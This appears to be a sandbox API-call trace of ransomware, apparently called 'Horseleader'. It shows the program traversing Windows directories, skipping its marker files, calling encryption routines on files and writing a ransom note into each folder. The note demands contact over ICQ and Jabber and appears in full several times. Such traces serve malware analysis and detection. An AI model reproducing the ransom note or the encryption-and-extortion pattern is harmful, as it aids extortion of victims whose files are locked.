FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.709] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.710] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\#Decrypt#.txt") returned 74 [0231.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.710] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0231.711] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.712] lstrlenA (lpString="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") returned 1368 [0231.712] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.713] CloseHandle (hObject=0x158) returned 1 [0231.713] GetProcessHeap () returned 0x780000 [0231.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.713] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0231.713] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="Windows") returned -1 [0231.713] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 73 [0231.713] StrStrIW (lpFirst="FlickAnimation.avi", lpSrch=".horseleader") returned 0x0 [0231.713] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="#Decrypt#.txt") returned 1 [0231.713] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="_uninstalling_.png") returned 1 [0231.713] lstrlenW (lpString=".testttjffg") returned 11 [0231.713] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpSrch=".testttjffg") returned 0x0 [0231.713] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0231.713] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0231.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0231.714] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="Windows") returned -1 [0231.714] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned 78 [0231.714] StrStrIW (lpFirst="FlickLearningWizard.exe", lpSrch=".horseleader") returned 0x0 [0231.714] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="#Decrypt#.txt") returned 1 [0231.714] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="_uninstalling_.png") returned 1 [0231.714] lstrlenW (lpString=".testttjffg") returned 11 
[0231.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpSrch=".testttjffg") returned 0x0 [0231.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0231.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0231.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0231.715] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0231.715] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 60 [0231.715] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0231.715] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0231.715] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.715] GetProcessHeap () returned 0x780000 [0231.715] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0231.715] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*") returned 62 [0231.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.716] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\.") returned 62 [0231.716] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.716] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\..") returned 63 [0231.716] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.716] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.716] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned 76 [0231.716] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.716] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.716] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.716] lstrlenW (lpString=".testttjffg") returned 11 [0231.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.716] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\#Decrypt#.txt") returned 74 [0231.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.717] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0231.717] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.719] lstrlenA (lpString="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") returned 1368 [0231.719] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.719] CloseHandle (hObject=0x158) returned 1 [0231.719] GetProcessHeap () returned 0x780000 [0231.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.719] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0231.719] lstrcmpiW (lpString1="fsdefinitions", lpString2="Windows") returned -1 [0231.719] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 68 [0231.719] lstrcmpW (lpString1="fsdefinitions", lpString2=".") returned 1 [0231.719] lstrcmpW (lpString1="fsdefinitions", lpString2="..") returned 1 [0231.719] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.719] GetProcessHeap () returned 0x780000 
[0231.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0231.719] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*") returned 70 [0231.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.748] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\.") returned 70 [0231.748] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.748] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\..") returned 71 [0231.748] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0231.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="auxpad", cAlternateFileName="")) returned 1 [0231.748] lstrcmpiW (lpString1="auxpad", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 75 [0231.748] lstrcmpW (lpString1="auxpad", lpString2=".") returned 1 [0231.748] lstrcmpW (lpString1="auxpad", lpString2="..") returned 1 [0231.748] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.748] GetProcessHeap () returned 0x780000 [0231.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0231.748] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*") returned 77 [0231.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, 
ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.773] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.773] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\.") returned 77 [0231.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.773] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.774] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.774] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\..") returned 78 [0231.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.774] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0231.774] lstrcmpiW (lpString1="auxbase.xml", 
lpString2="Windows") returned -1 [0231.774] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 87 [0231.774] StrStrIW (lpFirst="auxbase.xml", lpSrch=".horseleader") returned 0x0 [0231.774] lstrcmpW (lpString1="auxbase.xml", lpString2="#Decrypt#.txt") returned 1 [0231.774] lstrcmpW (lpString1="auxbase.xml", lpString2="_uninstalling_.png") returned 1 [0231.774] lstrlenW (lpString=".testttjffg") returned 11 [0231.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpSrch=".testttjffg") returned 0x0 [0231.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.775] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.815] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="auxbase.xml", cAlternateFileName="")) returned 0 [0231.815] FindClose (in: 
hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0231.816] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\#Decrypt#.txt") returned 89 [0231.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0231.816] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name 